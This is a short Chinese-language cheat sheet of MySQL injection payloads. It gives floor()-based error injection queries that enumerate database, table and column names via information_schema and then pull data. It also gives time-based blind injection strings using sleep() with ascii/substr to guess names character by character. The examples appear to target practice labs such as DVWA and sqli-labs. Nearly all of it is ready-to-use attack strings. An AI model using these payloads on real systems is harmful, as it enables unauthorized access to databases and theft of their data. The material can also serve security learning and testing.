floor报错注入
	爆库名
	select count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a;
	-- 在rand后的()中加0，百分百报错。假设得到的数据库名是dvwa

	爆表的数目
	select count(*),concat(
	(select count(*) from information_schema.tables where table_schema='dvwa')
	,floor(rand(0)*2))a from information_schema.tables group by a;

	爆表名
	select count(*),concat(
	(select table_name from information_schema.tables where table_schema='dvwa' limit 0,1)
	,floor(rand(0)*2))a from information_schema.tables group by a;
	-- limit 0,1爆第一个表名，limit 1,1爆第二个表名，以此类推
	-- 假设得到表名guestbook，users

	爆列名
	select count(*),concat(
	(select column_name from information_schema.columns where table_name='users' limit 0,1)
	,floor(rand(0)*2))a from information_schema.tables group by a;
	-- limit 0,1爆第一个列名，limit 1,1爆第二个列名，以此类推

	查询数据
	select count(*),concat(
	(查询语句 limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a;
	
updatexml报错注入
	https://blog.csdn.net/weixin_45253622/article/details/115003792
extractvalue报错注入
	https://blog.csdn.net/weixin_45253622/article/details/115003792
	
时间盲注
	id=1' and if(1=2,1,sleep(10)) --+
	id=1" and if(1=2,1,sleep(10)) --+
	id=1) and if(1=2,1,sleep(10)) --+
	
	id=1' and if(length(database())>1,sleep(2),0) --+
	增加1值来猜库名的长度
	id=1' and if(ascii(substr(database(),1,1))>114,sleep(2),0) --+
	增加1值，对照ascii表查询库名
	id=1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101,sleep(1),0)--+
	增加1值，对照ascii表查询表名
	id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),1,1))>104,sleep(1),0)--+
	增加1值，对照ascii表查询列名
	id=1' and if(ascii(substr((select id from emails limit 0,1),1,1))>49,sleep(1),0)--+
	根据表名和列名进行暴值
